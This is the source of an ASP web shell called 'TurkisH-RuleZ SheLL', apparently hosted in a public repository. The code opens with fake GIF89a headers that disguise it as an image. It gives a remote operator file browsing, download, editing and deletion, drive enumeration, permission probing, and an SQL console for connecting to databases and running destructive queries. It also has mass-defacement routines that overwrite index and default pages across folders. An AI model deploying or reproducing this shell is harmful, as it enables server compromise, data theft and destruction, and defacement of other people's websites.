-
Notifications
You must be signed in to change notification settings - Fork 55
/
TurkisH-RuleZ.aspx
2807 lines (2566 loc) · 137 KB
/
TurkisH-RuleZ.aspx
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624
625
626
627
628
629
630
631
632
633
634
635
636
637
638
639
640
641
642
643
644
645
646
647
648
649
650
651
652
653
654
655
656
657
658
659
660
661
662
663
664
665
666
667
668
669
670
671
672
673
674
675
676
677
678
679
680
681
682
683
684
685
686
687
688
689
690
691
692
693
694
695
696
697
698
699
700
701
702
703
704
705
706
707
708
709
710
711
712
713
714
715
716
717
718
719
720
721
722
723
724
725
726
727
728
729
730
731
732
733
734
735
736
737
738
739
740
741
742
743
744
745
746
747
748
749
750
751
752
753
754
755
756
757
758
759
760
761
762
763
764
765
766
767
768
769
770
771
772
773
774
775
776
777
778
779
780
781
782
783
784
785
786
787
788
789
790
791
792
793
794
795
796
797
798
799
800
801
802
803
804
805
806
807
808
809
810
811
812
813
814
815
816
817
818
819
820
821
822
823
824
825
826
827
828
829
830
831
832
833
834
835
836
837
838
839
840
841
842
843
844
845
846
847
848
849
850
851
852
853
854
855
856
857
858
859
860
861
862
863
864
865
866
867
868
869
870
871
872
873
874
875
876
877
878
879
880
881
882
883
884
885
886
887
888
889
890
891
892
893
894
895
896
897
898
899
900
901
902
903
904
905
906
907
908
909
910
911
912
913
914
915
916
917
918
919
920
921
922
923
924
925
926
927
928
929
930
931
932
933
934
935
936
937
938
939
940
941
942
943
944
945
946
947
948
949
950
951
952
953
954
955
956
957
958
959
960
961
962
963
964
965
966
967
968
969
970
971
972
973
974
975
976
977
978
979
980
981
982
983
984
985
986
987
988
989
990
991
992
993
994
995
996
997
998
999
1000
GIF89a;
GIF89a;
GIF89a;
GIF89a;
<%
'if request("rootx") = "b0x" then
'response.cookies("yes") = "1"
'response.cookies("yes").expires = now+352
'end if
'if not request.cookies("yes") = "1" then
'response.end()
'end if
Server.ScriptTimeOut = 7200
Fullpath=replace(Request.ServerVariables("PATH_TRANSLATED"),"/","\")
FilePath = mid(Fullpath,InStrRev(Fullpath,"\")+1)
FolderPath = Left(Fullpath,InStrRev(Fullpath,"\"))
const charset="abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_-"
const karakter1="ABCDEFGHIJKLMNOPQRSTUVWXYZ"
const karakter2="abcdefghijklmnopqrstuvwxyz"
const karakter3="0123456789"
const karakter4="!@#$%^&*()-_+=~`[]{}|\:;<>,.?/"
mail_array = array("yahoo","hotmail","mynet","gmail","hacker") '?zel mailler yaratmak için, SPAM dan kaç?rmak için. Securityi a?mak için by b0x
uzanti_array = array("com","net","biz","org","gov","br","info")
yasak_array = array("b0x","CYBERWARRIOR","CYBERSECURITY","GAL","GAL","TURK")
Dim b0x
Set b0x = CreateObject("Scripting.FileSystemObject")
Path = Trim(request("Path"))
mode = request("mode")
FolderPath2 = request("FolderPath2")&"\"
islem = request("islem")
del = request("del")
file = request("file")
folder = request("folder")
table = Request("table")
inject1 = Request("inject1")
inject2 = Request("inject2")
inject3 = Request("inject3")
inject4 = Request("inject4")
inject5 = Request("inject5")
cmdkod = Request("cmdkod")
hacked = request("hacked")
Path = request("Path")
url = request("url")
count = request("count")
size = request("size")
dbname = request("dbname")
dbkadi = request("dbkadi")
dbsifre = request("dbsifre")
b0xsql = request("b0xsql")
sec = request("sec")
Usermd5 = request("Usermd5")
ara1 = request("ara1")
ara2 = request("ara2")
k1 = request("k1")
k2 = request("k2")
k3 = request("k3")
k4 = request("k4")
waiting = request("waiting")
coding = request("coding")
dizi = request("dizi")
Usersmd5 = request("Usersmd5")
salt = request("salt")
hash2 = request("hash2")
hash3 = request("hash3")
hash4 = request("hash4")
hash5 = request("hash5")
hash6 = request("hash6")
hash7 = request("hash7")
hash8 = request("hash8")
hash9 = request("hash9")
hash10 = request("hash10")
if Path = "" then
Path = FolderPath
else
FolderPath = Path
end if
if mode = "1" then
FolderPath = request.form("remote")
Path = request.form("remote")
end if
nolist = False
popup = False
if mode = "2" or mode = "3" or mode = "7" or mode = "8" or mode = "16" or mode = "17" or mode = "18" or mode = "19" or mode = "20" or mode = "21" or mode = "22" or mode = "24" or mode = "25" or mode = "26" or mode = "27" or mode = "28" or mode = "29" or mode = "30" or mode = "31" or mode = "32" or mode = "33" or mode = "36" or mode = "38" or mode = "39" or mode = "40" or mode = "41" or mode = "42" or mode = "43" or mode = "44" or mode = "45" or mode = "99" then
popup = True
end if
if mode = "6" then
Response.Buffer=True
Set Fil = b0x.GetFile(file)
Response.contenttype="application/force-download"
Response.AddHeader "Cache-control","private"
Response.AddHeader "Content-Length", Fil.Size
Response.AddHeader "Content-Disposition", "attachment; filename=" & Fil.name
Response.BinaryWrite readBinaryFile(Fil.path)
Set f = Nothing: Set Fil = Nothing
response.end
end if
response.write "<title># TurkisH-RuleZ SheLL </title>"
response.write "<meta http-equiv=""Content-Type"" content=""text/html; charset=iso-8859-9"">"
response.write "<style>"
response.write "body{margin:0px;font-style:normal;font-size:10px;color:#FFFFFF;font-family:Verdana,Arial;background-color:#3a3a3a;scrollbar-face-color: #303030;scrollbar-highlight-color: #5d5d5d;scrollbar-shadow-color: #121212;scrollbar-3dlight-color: #3a3a3a;scrollbar-arrow-color: #9d9d9d;scrollbar-track-color: #3a3a3a;scrollbar-darkshadow-color: #3a3a3a;}"
response.write ".k1{font-family:Wingdings; font-size:15px;}"
response.write ".k2{font-family:Webdings; font-size:15px;}"
response.write "td{font-style:normal;font-size:10px;color:#FFFFFF;font-family:Verdana,Arial;}"
response.write "a{color:#EEEEEE;text-decoration:none;}"
response.write "a:hover{color:#40a0ec;}"
response.write "a:visited{color:#EEEEEE;}"
response.write "a:visited:hover{color:#40a0ec;}"
response.write "input,"
response.write ".kbrtm,"
response.write "select{background:#303030;color:#FFFFFF;font-family:Verdana,Arial;font-size:10px;vertical-align:middle; height:18; border-left:1px solid #5d5d5d; border-right:1px solid #121212; border-bottom:1px solid #121212; border-top:1px solid #5d5d5d;}"
response.write "textarea{background:#121212;color:#FFFFFF;font-family:Verdana,Arial;font-size:10px;vertical-align:middle; height:18; border-left:1px solid #121212; border-right:1px solid #5d5d5d; border-bottom:1px solid #5d5d5d; border-top:1px solid #121212;}"
response.write "</style>"
%>
<script language=javascript>
function NewWindow(mypage, myname, w, h, scroll) {
var winl = (screen.width - w) / 2;
var wint = (screen.height - h) / 2;
winprops = 'height='+h+',width='+w+',top='+wint+',left='+winl+',scrollbars='+scroll+',resizable'
win = window.open(mypage, myname, winprops)
if (parseInt(navigator.appVersion) >= 4) { win.window.focus(); }
}
function klasorkopya(yol){
NewWindow(yol,"",400,130,"no");
}
function mass(yol){
NewWindow(yol,"",555,600,"yes");
}
function tester(yol){
NewWindow(yol,"",600,600,"yes");
}
function klasor(yol){
NewWindow(yol,"",420,450,"yes");
}
function cmd(yol){
NewWindow(yol,"",550,555,"no");
}
function biz(yol){
NewWindow(yol,"",550,700,"no");
}
function cmdhelp(yol){
NewWindow(yol,"",500,230,"no");
}
function somur(yol){
NewWindow(yol,"",420,220,"yes");
}
</script>
<script language="JavaScript">
function openInMainWin(winLocation){
window.opener.location.href = winLocation
window.opener.focus();
}
</script>
<%
sub KlasorOku
on error resume next
Set f = b0x.GetFolder(FolderPath)
Set fc = f.SubFolders
For Each f1 In fc
Response.Write "<table class=""kbrtm"" ><tr><td><font class=""k1""><a title="" Move And Copy ?? "" href='"&FilePath&"?mode=2&Path="&FolderPath&"\"&f1.Name&"&Time="&time&"' onclick=""klasorkopya(this.href);return false;"">4</a></font> <font class=""k1""><a title="" Delete File "" href='"&FilePath&"?mode=4&Path="&FolderPath&"&del="&FolderPath&"\"&f1.Name&"&Time="&time&"'>û</a> 1</font><font size=2><b><a title="" Dizinin içine Gir "" href='"&FilePath&"?Path="&FolderPath&"\"&f1.Name&"&Time="&time&"'>"&f1.name&"</a></b></td></tr></table>"
Response.Flush
Next
call Status
end sub
sub DosyaOku
on error resume next
Set f = b0x.GetFolder(FolderPath)
Set fc = f.Files
For Each f1 In fc
dosyaAdi = f1.name
num = InStrRev(dosyaAdi,".")
uzanti = lcase(Right(dosyaAdi,len(dosyaAdi)-num))
downStr = "<a title=""Delete File"" href='"&FilePath&"?mode=5&Path="&FolderPath&"&del="&FolderPath&"\"&f1.Name&"&Time="&time&"'>û</a><font face=webdings><a title="" Download File "" href='"&FilePath&"?mode=6&file="&f1.path&"&Path="&FolderPath&"&Time="&time&"'>?</a></font><font face=wingdings><a title="" Copy/Move File?? "" href='"&FilePath&"?mode=7&file="&f1.path&"&Time="&time&"' onclick=""klasorkopya(this.href);return false;"">4</a><a title="" Rename File "" href='"&FilePath&"?mode=16&file="&f1.path&"&islem="&f1.name&"&Path="&FolderPath&"&Time="&time&"' onclick=""klasorkopya(this.href);return false;"">?</a></font>"
response.Write "<table class=""kbrtm"" ><tr><td><font size=2>"
select case uzanti
case "mdb"
Response.Write "<a title="" Db in içini G?rmek , SQl sorgu yapmak için T?kla Developed By TurkisH-RuleZ "" href='"&FilePath&"?mode=13&file="&FolderPath&"\"&f1.Name&"&Path="&FolderPath&"&Time="&time&"'>"&f1.name&" [<font color=yellow>"&FormatNumber(f1.size,0)&"</font>]"&"</a></b> <font face=wingdings size=4>M "&downStr&"</font></td></tr></table>"
case "asp"
Response.Write "<a title="" ?çini Gomek için T?kla "" href='"&FilePath&"?mode=9&file="&FolderPath&"\"&f1.Name&"&Path="&FolderPath&"&Time="&time&"'>"&f1.name&" [<font color=yellow>"&FormatNumber(f1.size,0)&"</font>]"&"</a></b> <font face=wingdings size=4>± <a title="" Edit File "" href='"&FilePath&"?mode=10&file="&f1.path&"&Time="&time&"&Path="&FolderPath&"'>!</a>"&downStr&"</font></td></tr></table>"
case "jpg","gif"
Response.Write "<a title="" Resmi G?rmek için T?kla "" href='"&FilePath&"?mode=12&file="&FolderPath&"\"&f1.Name&"&Path="&FolderPath&"&Time="&time&"'>"&f1.name&" [<font color=yellow>"&FormatNumber(f1.size,0)&"</font>]"&"</a></b> <font face=webdings size=4>¢</font><font face=wingdings size=4> "&downStr&"</font></td></tr></table>"
case else
Response.Write "<a title="" ?çini Gomek için T?kla "" href='"&FilePath&"?mode=9&file="&FolderPath&"\"&f1.Name&"&Path="&FolderPath&"&Time="&time&"'>"&f1.name&" [<font color=yellow>"&FormatNumber(f1.size,0)&"</font>]"&"</a></b> <font face=wingdings size=4>2 <a title="" Edit File "" href='"&dosyaPath&"?mode=10&file="&f1.path&"&Time="&time&"&Path="&FolderPath&"'>!</a>"&downStr&"</font></td></tr></table>"
end select
Next
call Status
end sub
sub Suruculer
for each drive_ in b0x.Drives
Response.Write "<tr bgcolor=""#3a3a3a""><td height=""20"" class=""kbrtm"">"
Response.Write "<a href="" "&FilePath&"?Path="&drive_.DriveLetter&":/ "">"
if drive_.Drivetype=1 then Response.write " <font class=""k1""><</font> Disk Drive [" & drive_.DriveLetter & ":] <a title=""Sürücü Detay? ?çin T?kla"" href="""&FilePath&"?dspace="&drive_.DriveLetter&"&Path="&Path&"""><font class=""k1"">?</font></a>"
if drive_.Drivetype=2 then Response.write " <font class=""k1"">;</font> Disk Drive [" & drive_.DriveLetter & ":] <a title=""Sürücü Detay? ?çin T?kla"" href="""&FilePath&"?dspace="&drive_.DriveLetter&"&Path="&Path&"""><font class=""k1"">?</font></a>"
if drive_.Drivetype=3 then Response.write " <font class=""k1"">;</font> C?kar?labilir Disk [" & drive_.DriveLetter & ":] <a title=""Sürücü Detay? ?çin T?kla"" href="""&FilePath&"?dspace="&drive_.DriveLetter&"&Path="&Path&"""><font class=""k1"">?</font></a>"
if drive_.Drivetype=4 then Response.write " <font class=""k2"">³</font> Cd-Rom [" & drive_.DriveLetter & ":] <a title=""Sürücü Detay? ?çin T?kla"" href="""&FilePath&"?dspace="&drive_.DriveLetter&"&Path="&Path&"""><font class=""k1"">?</font></a>"
Response.Write "</a></td></tr>"
next
Response.Write "<tr bgcolor=""#3a3a3a""><td class=""kbrtm"" height=""20""> <a href="" "&FilePath&" ""><font class=""k2"">H</font> Local Path </a></td></tr>"
end sub
Sub SurucuInfo
'Disk Alan?n? G?sterir - Coded Developed By TurkisH-RuleZ
DriveSpace = Request("dspace")
If Not DriveSpace = "" Then
on error resume next
Set driveObject = b0x.GetDrive(DriveSpace)
D1 = Left((driveObject.FreeSpace/(driveObject.TotalSize*1.0))*100.0, 4)
if err <> 0 then
response.write "<center><br> <font color=#FE7A84> <font face=Wingdings size=5>N</font> Disk Haz?r de?il !!!! :( <font face=Wingdings size=5>N</font></font> <br></center>"
else
D2 = Left(((driveObject.TotalSize - driveObject.FreeSpace)/(driveObject.TotalSize*1.0))*100.0, 4)
D3 = 100
D1a = 110 - D1
D2a = 110 - D2
D3a = 110 - D3
Response.Write "<br><center><table cellspacing=0 cellpadding=0><tr><td style='background-color: #121212;' colspan=4 align=center class=kbrtm><b>Disk :</b> " & driveObject.DriveLetter & "</td></tr><tr><td class=kbrtm width=60> </td><td class=kbrtm width=100 align=center><b>Bo? Alan</b></td><td class=kbrtm width=100 align=center><b>Kullan?lan Alan</b></td><td class=kbrtm width=100 align=center><b>Toplam Alan</b></td></tr><tr><td height=110 class=kbrtm> </td><td class=kbrtm align=center><table cellpadding=0 cellspacing=0><tr><td colspan=3 height="&D1a&"></td></tr><tr height="&D1&"><td bgcolor=#009900 width=2></td><td bgcolor=#33CC00 width=15></td><td bgcolor=#009900 width=2></td></tr></table></td><td class=kbrtm align=center valign=bottom><table cellpadding=0 cellspacing=0><tr><td colspan=3 height="&D2a&"></td></tr><tr height="&D2&"><td bgcolor=#990000 width=2></td><td bgcolor=#CC0000 width=15></td><td bgcolor=#990000 width=2></td></tr></table></td><td class=kbrtm align=center valign=bottom><table cellpadding=0 cellspacing=0><tr><td colspan=3 height="&D3a&"></td></tr><tr height="&D3&"><td bgcolor=#006699 width=2></td><td bgcolor=#0088CC width=15></td><td bgcolor=#006699 width=2></td></tr></table></td></tr><tr><td class=kbrtm> <b>Yüzde :</b></td><td class=kbrtm align=center>"&D1&" %</td><td class=kbrtm align=center>"&D2&" %</td><td class=kbrtm align=center>"&D3&" %</td></tr><tr><td class=kbrtm> <b>Boyut :</b></td><td class=kbrtm align=center> " & FormatNumber(driveObject.FreeSpace / 1048576) & " MB</td><td class=kbrtm align=center> " & FormatNumber(driveObject.TotalSize / 1048576) - FormatNumber(driveObject.FreeSpace / 1048576) & " MB</td><td class=kbrtm align=center> " & FormatNumber(driveObject.TotalSize / 1048576) & " MB</td></tr></table></center><br><br><br>"
end if
Set driveObject = Nothing
End If
end sub
sub yetkino(str)
response.write "<td class=""kbrtm""> <b><font color=#FBE1D7>"&str&" :</font></b> <font color=#FE7A84 class=""k1"">û</font> </td>"
End Sub
sub yetkiyes(str)
response.write "<td class=""kbrtm""> <b><font color=#FAFEDE>"&str&" :</font></b> <font color=#C6FCBE class=""k1"">ü</font> </td>"
end Sub
sub Yetki
on error resume next
Set f = b0x.GetFolder(FolderPath)
if err<>0 then
yetkino("Reading ")
yetkino("Writing ")
yetkino("Deleting ")
else
yetkiyes("Reading ")
on error resume next
Set MyFile = b0x.CreateTextFile(FolderPath & "test.b0x", True)
MyFile.write "b0x Was Here... =) Writing - Reading Testi için"
set MyFile = Nothing
if err<>0 then
yetkino("Writing ")
yetkino("Deleting ")
else
yetkiyes("Writing ")
on error resume next
b0x.DeleteFile FolderPath & "test.b0x",true
if err<>0 then
yetkino("Deleting ")
else
yetkiyes("Deleting ")
end if
end if
end if
set f = nothing
end sub
Sub olmadi(str)
response.write "<br><center><font color=#FE7A84> <font face=Wingdings size=5>N</font> "&str&" :( <font face=Wingdings size=5>N</font> </font></center>"
End Sub
Sub oldu(str)
response.write "<br><center><font color=#C6FCBE> <font face=Wingdings size=5>N</font> "&str&" ;) Tebrikler ??lem Ba?ar?yla Gerçekle?tirildi.. by b0x <font face=Wingdings size=5>N</font> </font></center>"
End Sub
Sub tablo12(str)
response.write "<tr bgcolor=""#121212""><td align=""center"" width=""100%"" valign=""middle"">"&str&"</td></tr>"
End Sub
Sub tablo30(str)
response.write "<tr bgcolor=""#303030""><td class=""kbrtm"" align=""center"" width=""100%"" valign=""middle"">"&str&"</td></tr>"
End Sub
Sub tablo12L(str)
response.write "<tr bgcolor=""#121212""><td align=""center"" width=""100%"" valign=""middle"">"&str&"</td></tr>"
End Sub
Sub tablo12O(str)
response.write "<tr bgcolor=""#121212""><td class=""kbrtm"" align=""center"" width=""100%"" valign=""middle"">"&str&"</td></tr>"
End Sub
sub Status
if err<>0 then
Response.Write "<center><font color=red size=2>Status : "&err.Description&"</font></center>"
end if
end sub
Function ReadBinaryFile(FileName)
Const adTypeBinary = 1
Dim BinaryStream
Set BinaryStream = CreateObject("ADODB.Stream")
BinaryStream.Type = adTypeBinary
BinaryStream.Open
BinaryStream.LoadFromFile FileName
ReadBinaryFile = BinaryStream.Read
End Function
Sub SQL_menu_by_b0x
response.write "<center><table width=""450"">"
response.write "<tr class=""kbrtm"" valign=""top""><td colspan=""2"" align=""center"">"
response.write "<form name=""dosyacopypaste"" action='"&FilePath&"' type=""post"">"
response.write "<table class=""kbrtm"" cellpadding=""1"" cellspacing=""1"" bgcolor=""#5d5d5d"" width=""100%"">"
tablo30(" <b>SQL ?njection Merkezi</b>")
tablo30(" ")
tablo12("<font color=#FE7A84> Kullanabilmeniz için SQL kou?tlar? bilmeniz gerek !!! <br> <font face=Wingdings size=5>N</font> Aksi Halde ASP DOsya? Kitlenir. Cevap veremez. Server a Zarar verir. <font face=Wingdings size=5>N</font></font>")
tablo12(" Select <input value=""select"" type=""radio"" name=""islem"" checked> <input size=""60"" type=""text"" name=""inject1"" value='Select * from "&table&"'>")
tablo12(" Delete <input value=""delete"" type=""radio"" name=""islem"" > <input size=""60"" type=""text"" name=""inject2"" value='Delete from "&table&"'>")
tablo12(" Insert <input value=""insert"" type=""radio"" name=""islem"" > <input size=""60"" type=""text"" name=""inject3"" value='Insert into "&table&" () values ()'>")
tablo12(" Update <input value=""update"" type=""radio"" name=""islem"" > <input size=""60"" type=""text"" name=""inject4"" value='Update "&table&" set .. where ..'>")
tablo12(" Di?er <input value=""diger"" type=""radio"" name=""islem"" > <input size=""60"" type=""text"" name=""inject5"" value='Drop "&table&"'>")
tablo12("<input name=""mode"" type=""hidden"" value='15' ><input name=""sec"" type=""hidden"" value='"&sec&"' ><input name=""b0xsql"" type=""hidden"" value='"&b0xsql&"' ><input name=""file"" type=""hidden"" value='"&file&"' ><input name=""Path"" type=""hidden"" value='"&FolderPath&"' ><input name=""table"" type=""hidden"" value='"&table&"' ><br><input value="" SQL ?nj. Uygula "" type=""Submit""><br><br>")
if b0xsql = "" then
tablo12("<a href='"&FilePath&"?mode=13&file="&file&"&Path="&FolderPath&"&Time="&time&"'> .... ::: Tablolara Geri D?n ::: .... </a><br>")
else
tablo12("<a href='"&FilePath&"?mode=34&file="&file&"&Path="&Path&"&b0xsql="&b0xsql&"&islem=1&Time="&time&"'> .... ::: Tablolara Geri D?n ::: .... </a><br>")
end if
response.write "</form></table></td></tr></table><br></center>"
response.write "<table align=""center"" class=""kbrtm""><tr><td align='center'> <a href='"&FilePath&"?mode=36&Path="&Path&"&Time="&time&"' onclick=""klasor(this.href);return false;""><b>...:::::: SQL Komut Yard?m - Kullan?m Klavuzu by b0x ::::::...</b></a> </td></tr></table><br>"
end sub
Sub SQL_by_b0x(sqlPath,sqlkomut)
on error resume next
Set objConn = Server.CreateObject("ADODB.Connection")
Set objRcs = Server.CreateObject("ADODB.RecordSet")
objConn.Provider = "Microsoft.Jet.Oledb.4.0"
objConn.ConnectionString = sqlPath
objConn.Open
if err <> 0 then
response.write "<br><br><center> <font color=#FE7A84> <font face=Wingdings size=5>N</font> DataBase ile Ba?lant?n?z Sa?lanamad? !!! by b0x :( <font color=#FE7A84> <font face=Wingdings size=5>N</font> </font> </center><br><br>"
else
on error resume next
objRcs.Open sqlkomut,objConn, adOpenKeyset , , adCmdText
if err <> 0 then
response.write "<br><br><center> <font color=#FE7A84> <font face=Wingdings size=5>N</font> SQL ?njection Komutunuzda Status var. ( Bilmiyorsan KullanMA :) ) by b0x <font color=#FE7A84> <font face=Wingdings size=5>N</font> </font> </center><br><br>"
else
Response.Write "<center><table class=""kbrtm"" border=1 cellpadding=2 cellspacing=0 bordercolor=543152><tr bgcolor=silver>"
for i=0 to objRcs.Fields.count-1
Response.Write "<td><font color=black><b> "&objRcs.Fields(i).Name&" </font></td>"
next
Response.Write "</tr>"
do while not objRcs.EOF
Response.Write "<tr class=""kbrtm"">"
for i=0 to objRcs.Fields.count-1
Response.Write "<td class=""kbrtm"">"&Replace(objRcs.Fields(i).Value,"<","<")&" </td>"
next
Response.Write "</tr>"
objRcs.MoveNext
loop
Response.Write "</table><br></center>"
end if
end if
end sub
Sub MSSQL_by_b0x(sqlPath,sqlkomut)
on error resume next
Set objConn = Server.CreateObject("ADODB.Connection")
Set objRcs = Server.CreateObject("ADODB.RecordSet")
objConn.Open sqlPath
if err <> 0 then
response.write "<br><br><center> <font color=#FE7A84> <font face=Wingdings size=5>N</font> DataBase ile Ba?lant?n?z Sa?lanamad?? !!! by b0x :( <font color=#FE7A84> <font face=Wingdings size=5>N</font> </font> </center><br><br>"
else
on error resume next
objRcs.Open sqlkomut,objConn, adOpenKeyset , , adCmdText
if err <> 0 then
response.write "<br><br><center> <font color=#FE7A84> <font face=Wingdings size=5>N</font> SQL ?njection Komutunuzda Status var. ( Bilmiyorsan KullanMA :) ) by b0x <font color=#FE7A84> <font face=Wingdings size=5>N</font> </font> </center><br><br>"
else
Response.Write "<center><table class=""kbrtm"" border=1 cellpadding=2 cellspacing=0 bordercolor=543152><tr bgcolor=silver>"
for i=0 to objRcs.Fields.count-1
Response.Write "<td><font color=black><b> "&objRcs.Fields(i).Name&" </font></td>"
next
Response.Write "</tr>"
do while not objRcs.EOF
Response.Write "<tr class=""kbrtm"">"
for i=0 to objRcs.Fields.count-1
Response.Write "<td class=""kbrtm"">"&objRcs.Fields(i).Value&" </td>"
next
Response.Write "</tr>"
objRcs.MoveNext
loop
Response.Write "</table><br></center>"
end if
end if
end sub
sub Tablolama()
on error resume next
if b0xsql = "" then
if sec = "mssql" then
b0xsql = "PROVIDER=SQLOLEDB;DATA SOURCE="&file&";UID="&dbkadi&";PWD="&dbsifre&";DATABASE="&dbname&""
else
b0xsql = "Driver={MySQL ODBC 3.51 Driver};Server="&file&";Database="&dbname&";Uid="&dbkadi&";Pwd="&dbsifre&""
end if
end if
Set objConn = Server.CreateObject("ADODB.Connection")
Set objADOX = Server.CreateObject("ADOX.Catalog")
objConn.Open b0xsql
objADOX.ActiveConnection = objConn
if err = 0 then
Response.Write "<center><b><font size=3>Tablolar</font></br><br>"
response.write "<table class=""kbrtm"">"
For Each table in objADOX.Tables
If table.Type = "TABLE" Then
Response.Write "<tr><td><font face=wingdings size=5>4</font> <a href='"&FilePath&"?mode=35&b0xsql="&b0xsql&"&table="&table.Name&"&Path="&Path&"&time="&time&"'>"&table.Name&"</a></td></tr>"
End If
Next
response.write "</table>"
response.write "</center>"
else
Call MSSQL_Form
yazortaa("<br><br><center> <font color=#FE7A84> <font face=Wingdings size=5>N</font> Server ile ba?lant? Sa?lanamad? !!! girilen De?erler yanl?? .. :( by b0x <font face=Wingdings size=5>N</font> </font><br><br></center>")
end if
end Sub
sub MSSQL_Form()
response.write "<center><table align=""center"" ><tr><td>"
yazorta("<b> MY-MS SQL Server Connection 2.0 by b0x </b>")
response.write "<table align=""center"" width=""100%"" class=""kbrtm""><tr><td align='center'><form name=""MssqlbyE_j_d?er"" method='post' action='"&FilePath&"?mode=34&Path="&Path&"&Time="&time&"'><input name='sec' checked value='mssql' type='radio'> <b>MsSQL</b> - <input name='sec' value='mysql' type='radio'> <b>MySQL</b></td></tr><tr><td>Server IP/Hostname : <input name='file' value='"&file&"' style='color=#C6FCBE' size=35 type='text'></td></tr><tr><td> DB Ad? : <input name='dbname' style='color=#C6FCBE' type='text' value='"&dbname&"' size=44></td></tr><tr><td> KAd? : <input name='dbkadi' style='color=#C6FCBE' value='"&dbkadi&"' type='text' size=46></td></tr><tr><td> ?ifre : <input name='dbsifre' style='color=#C6FCBE' type='text' value='"&dbsifre&"' size=46></td></tr><td align='center'> <input name='islem' type='hidden' value='1'><input name='gooo' value=' ..:: Ba?lan ::..' type='Submit'></td></tr></form></table>"
yazorta("TUm haklar? Sakl?d?r by b0x =)")
response.write "</td></tr></table></center>"
end sub
sub MassCopier(hedef)
on error resume next
Set cloner = b0x.GetFile(hacked)
cloner.Copy hedef,true
Set cloner = Nothing
end sub
sub MassCreater(yer,savsak)
on error resume next
Set savsakcom = b0x.CreateTextFile(yer, True)
savsakcom.write savsak
Set savsakcom = Nothing
end sub
sub MassAttack2(yer,ej,svk)
if hash3 = "ok" then
yer = yer&"\"&svk
end if
on error resume next
if not islem = "ozel" then
if hash9 = "copy" then
MassCopier(yer&"\index.html")
MassCopier(yer&"\index.htm")
MassCopier(yer&"\index.asp")
MassCopier(yer&"\index.cfm")
MassCopier(yer&"\index.php")
MassCopier(yer&"\default.html")
MassCopier(yer&"\default.htm")
MassCopier(yer&"\default.asp")
MassCopier(yer&"\default.cfm")
MassCopier(yer&"\default.php")
else
Call MassCreater(yer&"\index.html",ej)
Call MassCreater(yer&"\index.htm",ej)
Call MassCreater(yer&"\index.asp",ej)
Call MassCreater(yer&"\index.cfm",ej)
Call MassCreater(yer&"\index.php",ej)
Call MassCreater(yer&"\default.html",ej)
Call MassCreater(yer&"\default.htm",ej)
Call MassCreater(yer&"\default.asp",ej)
Call MassCreater(yer&"\default.cfm",ej)
Call MassCreater(yer&"\default.php",ej)
end if
else
if hash9 ="copy" then
MassCopier(yer&"\"&inject1)
else
Call MassCreater(yer&"\"&inject1,ej)
end if
end if
a = Replace(FilePath&"?Path="&yer&"&Time="&time,"\","/")
If Err.Number = 0 Then
response.write "<table width=""100%""><tr><td class=""kbrtm""><a href=# onClick=""openInMainWin('"&a&"');""> "&yer&" </a><font color=#C6FCBE> OK !! <font class=""k1"">ü</font></td></tr></table>"
else
response.write "<table width=""100%""><tr><td class=""kbrtm""><a href=# onClick=""openInMainWin('"&a&"');""> "&yer&" </a><font color=#FE7A84> Noo :( !! <font class=""k1"">û</font></td></tr></table>"
end if
Err.Number = 0
Response.Flush
end sub
sub MassAttack(yer,ej,svk)
dim fastb0x
on error resume next
Set f = b0x.GetFolder(yer)
Set fc = f.SubFolders
For Each f1 In fc
if hash3 = "ok" then
fastb0x = f1.path&"\"&svk
else
fastb0x = f1.path
end if
if not islem = "ozel" then
if hash9 = "copy" then
MassCopier(fastb0x&"\index.html")
MassCopier(fastb0x&"\index.htm")
MassCopier(fastb0x&"\index.asp")
MassCopier(fastb0x&"\index.cfm")
MassCopier(fastb0x&"\index.php")
MassCopier(fastb0x&"\default.html")
MassCopier(fastb0x&"\default.htm")
MassCopier(fastb0x&"\default.asp")
MassCopier(fastb0x&"\default.cfm")
MassCopier(fastb0x&"\default.php")
else
Call MassCreater(fastb0x&"\index.html",ej)
Call MassCreater(fastb0x&"\index.htm",ej)
Call MassCreater(fastb0x&"\index.asp",ej)
Call MassCreater(fastb0x&"\index.cfm",ej)
